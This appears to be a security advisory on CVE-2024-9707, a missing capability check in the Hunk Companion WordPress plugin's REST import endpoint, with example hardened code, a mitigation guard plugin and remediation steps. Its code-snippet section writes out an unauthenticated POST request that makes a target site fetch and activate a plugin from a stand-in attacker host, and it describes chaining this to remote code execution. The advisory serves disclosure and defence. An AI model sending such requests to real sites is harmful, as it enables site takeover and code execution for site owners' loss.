A critical vulnerability has been disclosed in the Hunk Companion plugin for WordPress that lets unauthenticated attackers install and activate arbitrary plugins. The vulnerability, tracked as CVE-2024-9707, affects all versions of Hunk Companion up to and including 1.8.4. On its own the flaw gives an attacker plugin installation and activation; it becomes remote code execution when the attacker uses it to install and activate a second plugin that carries its own exploitable weakness.
Vulnerability Details
The Hunk Companion plugin for WordPress allows unauthorized plugin installation and activation because the REST API endpoint /wp-json/hc/v1/themehunk-import is registered without a capability check: the handler never verifies that the caller holds the install_plugins (or activate_plugins) capability, so WordPress dispatches the request regardless of who sent it. An unauthenticated attacker can therefore send a crafted POST request to this endpoint and have the site install and activate a plugin of their choosing. This is turned into remote code execution by installing and activating a plugin that has a known vulnerability of its own and then exploiting that plugin.
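To make the missing check concrete, here is an added illustration (not Hunk Companion's actual source and not taken from any vendor advisory) of a WordPress REST route that installs and activates a plugin, registered first the insecure way and then with the capability check this class of bug lacks. The example/v1 namespace, the route names, the parameter names slug and activate, and the function names are all assumed for the example.

```php
<?php
// Added example, not Hunk Companion code. The example/v1 namespace, route
// names, parameter names and function names are all hypothetical.

// INSECURE registration: permission_callback returns true for everyone, so
// WordPress never asks whether the caller may install plugins and an
// unauthenticated POST goes straight to the installer. Omitting
// permission_callback entirely is the same mistake (plus a _doing_it_wrong notice).
add_action('rest_api_init', function () {
    register_rest_route('example/v1', '/insecure-import', [
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_import_plugin',
        'permission_callback' => '__return_true', // the bug
    ]);
});

// HARDENED registration: the same handler behind a real capability check and
// argument validation. Cookie-authenticated REST calls must also carry a valid
// X-WP-Nonce, which core verifies before permission_callback runs, so a forged
// cross-site request riding on a logged-in admin's browser is rejected too.
add_action('rest_api_init', function () {
    register_rest_route('example/v1', '/secure-import', [
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_import_plugin',
        'permission_callback' => 'example_can_import_plugin',
        'args'                => [
            'slug' => [
                'required'          => true,
                'type'              => 'string',
                'sanitize_callback' => 'sanitize_key',
                // A WordPress.org slug only; never accept a download URL from the caller.
                'validate_callback' => function ($value) {
                    return is_string($value) && preg_match('/^[a-z0-9-]{1,200}$/', $value) === 1;
                },
            ],
            'activate' => ['type' => 'boolean', 'default' => false],
        ],
    ]);
});

function example_can_import_plugin(WP_REST_Request $request) {
    // current_user_can() is false for an unauthenticated request (user ID 0).
    if (!current_user_can('install_plugins')) {
        return new WP_Error('rest_forbidden', 'Sorry, you are not allowed to install plugins.',
            ['status' => rest_authorization_required_code()]);
    }
    if ($request->get_param('activate') && !current_user_can('activate_plugins')) {
        return new WP_Error('rest_forbidden', 'Sorry, you are not allowed to activate plugins.',
            ['status' => rest_authorization_required_code()]);
    }
    return true;
}

function example_import_plugin(WP_REST_Request $request) {
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';

    $slug = $request->get_param('slug');

    // Resolve the slug through the WordPress.org API so the package URL is one
    // the site chose, not one the caller supplied.
    $api = plugins_api('plugin_information', ['slug' => $slug, 'fields' => ['sections' => false]]);
    if (is_wp_error($api)) {
        return $api;
    }

    $upgrader  = new Plugin_Upgrader(new WP_Ajax_Upgrader_Skin());
    $installed = $upgrader->install($api->download_link);
    if (is_wp_error($installed) || !$installed) {
        return new WP_Error('install_failed', 'Plugin installation failed.', ['status' => 500]);
    }

    $plugin_file = $upgrader->plugin_info(); // e.g. "slug/slug.php"
    if ($request->get_param('activate')) {
        $activated = activate_plugin($plugin_file);
        if (is_wp_error($activated)) {
            return $activated;
        }
    }

    return rest_ensure_response([
        'installed' => $plugin_file,
        'active'    => is_plugin_active($plugin_file),
    ]);
}
```

The important line is the permission_callback: with it, an anonymous POST to /wp-json/example/v1/secure-import gets a 401 (rest_authorization_required_code() returns 401 for anonymous callers and 403 for logged-in users without the capability) and the installer is never reached. The argument validation is secondary hardening; it stops the caller from steering the installer at an arbitrary archive, but it would not have prevented this CVE on its own.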
Original References
- Hunk Companion plugin on WordPress.org: https://wordpress.org/plugins/hunk-companion/
- CVE-2024-9707 Advisory on NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9707
Code Snippet
Consider the following illustrative request an attacker could send to the vulnerable endpoint. Note what it does not contain: no Cookie header, no X-WP-Nonce, no Authorization header. It is a completely unauthenticated request.
POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: target-website.com
Content-Type: application/json
Content-Length: <content-length>
{
"plugin_slug": "arbitrary-plugin",
"plugin_uri": "https://attacker-website.com/malicious-plugin.zip",
"activate": "true"
}
In this example the attacker sends a single POST request to the /wp-json/hc/v1/themehunk-import endpoint on the target website. The plugin_slug value names the plugin the attacker wants installed and activated, and the plugin_uri value points at the plugin archive hosted on the attacker's server. Because the endpoint performs no capability check, WordPress processes the request as if an administrator had made it.
Exploit Details
An attacker exploits this vulnerability by crafting a POST request whose JSON body carries the plugin_slug and plugin_uri parameters, with plugin_uri pointing at a plugin hosted on the attacker's server. When the request reaches the vulnerable endpoint, the Hunk Companion plugin downloads and installs the plugin named by plugin_uri. Setting the "activate" parameter to "true" activates it immediately after installation, so the attacker never needs a second request or any interaction from a site administrator.
Installation and activation are the whole of what this flaw provides. The damage comes from what gets installed: by choosing a plugin that has a known vulnerability of its own (an unauthenticated file upload, an arbitrary PHP evaluation endpoint, or a privilege escalation), the attacker then exploits that second plugin to run code on the server, take over administrator accounts, or alter site content, depending on the specific issue in the plugin they picked.
Recommendation and Remediation
At the time of writing the developer had not yet released a patch, so users are advised to deactivate and delete the Hunk Companion plugin until a release later than 1.8.4 that addresses this issue is available, and to install that release as soon as it ships. Keeping the WordPress core and every other plugin current also matters here specifically: the exploit chain depends on the attacker being able to install a plugin with a known vulnerability, and it does nothing useful if that second plugin has already been patched on WordPress.org.
Website administrators should also check their sites for signs that the endpoint has already been abused. Review the installed plugin list (wp-admin's Plugins page, or `wp plugin list` with WP-CLI) and the contents of wp-content/plugins/ for anything unfamiliar or recently created, and search web server access logs for POST requests to /wp-json/hc/v1/themehunk-import (and its ?rest_route= equivalent), which a legitimate site visitor has no reason to send. Regular backups and a web application firewall rule for that path will shorten recovery if an intrusion is found.
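As an added stop-gap for sites that cannot remove the plugin straight away (example code written for this page, not supplied by the vendor), the following must-use plugin refuses the endpoint to anyone without the install_plugins capability, logs every attempt to the PHP error log, and includes a helper that lists plugins whose files changed recently, which is the trace a successful exploit leaves behind. The route string /hc/v1/themehunk-import is the one from this advisory; the function names, the constant name and the [hc-guard] log prefix are assumed.

```php
<?php
/**
 * Plugin Name: Guard for the Hunk Companion import endpoint
 * Description: Added example, not vendor code. Copy into wp-content/mu-plugins/
 * to refuse unauthenticated calls to /wp-json/hc/v1/themehunk-import and log
 * every attempt, until the site runs a Hunk Companion release newer than 1.8.4.
 */

if (!defined('ABSPATH')) {
    exit;
}

// Routes to guard, as WP_REST_Request::get_route() reports them (namespace +
// route, no /wp-json prefix). The route below is the one from the advisory;
// add others here if you want to fence off more of the hc/v1 namespace.
const HC_GUARDED_ROUTES = ['/hc/v1/themehunk-import'];

add_filter('rest_pre_dispatch', 'hc_guard_rest_pre_dispatch', 10, 3);

/**
 * Runs before WordPress matches the request to a handler, so it fires even
 * though the vulnerable route itself performs no capability check.
 */
function hc_guard_rest_pre_dispatch($result, WP_REST_Server $server, WP_REST_Request $request) {
    // Core matches routes case-insensitively, so normalise before comparing;
    // otherwise /HC/v1/THEMEHUNK-IMPORT would slip past this guard.
    $route = strtolower(untrailingslashit($request->get_route()));
    if (!in_array($route, HC_GUARDED_ROUTES, true)) {
        return $result; // not a guarded route: let WordPress dispatch normally
    }

    // The check the plugin should have made. An unauthenticated request runs
    // as user ID 0, for which current_user_can() is always false.
    $allowed = current_user_can('install_plugins');

    // Log every hit, allowed or not. An unauthenticated POST here is exactly
    // the request the advisory describes.
    $ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '-';
    error_log(sprintf(
        '[hc-guard] %s %s %s from %s user=%d params=%s',
        $allowed ? 'ALLOW' : 'BLOCK',
        $request->get_method(),
        $route,
        $ip,
        get_current_user_id(),
        wp_json_encode($request->get_params())
    ));

    if ($allowed) {
        return $result;
    }

    // Returning a WP_Error from rest_pre_dispatch short-circuits dispatch;
    // rest_authorization_required_code() yields 401 for anonymous callers.
    return new WP_Error(
        'rest_forbidden',
        'This endpoint is disabled on this site until the plugin is updated.',
        ['status' => rest_authorization_required_code()]
    );
}

/**
 * Lists plugins whose directory changed after $since, to help answer "was the
 * endpoint already abused?". Run from WP-CLI:
 *   wp eval 'print_r(hc_guard_recent_plugins("-30 days"));'
 */
function hc_guard_recent_plugins($since = '-30 days') {
    if (!function_exists('get_plugins')) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    $cutoff = strtotime($since);
    $recent = [];
    foreach (array_keys(get_plugins()) as $plugin_file) {
        $dir = dirname($plugin_file);
        // Single-file plugins live directly in the plugins directory.
        $path  = WP_PLUGIN_DIR . '/' . ($dir === '.' ? $plugin_file : $dir);
        $mtime = @filemtime($path);
        if ($mtime !== false && $mtime >= $cutoff) {
            $recent[$plugin_file] = gmdate('c', $mtime);
        }
    }
    return $recent;
}
```

Because it lives in wp-content/mu-plugins/ it loads before ordinary plugins and cannot be deactivated from the dashboard, which is what you want from a guard an attacker might otherwise try to switch off; remember to delete the file once the updated Hunk Companion release is installed. The guard covers both the pretty /wp-json/ form and the ?rest_route= form of the URL, since both pass through rest_pre_dispatch, but it is a mitigation, not a fix: the plugin's own handler is still unchanged underneath.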
Timeline
Published on: 10/11/2024 13:15:21 UTC
Last modified on: 10/15/2024 12:58:51 UTC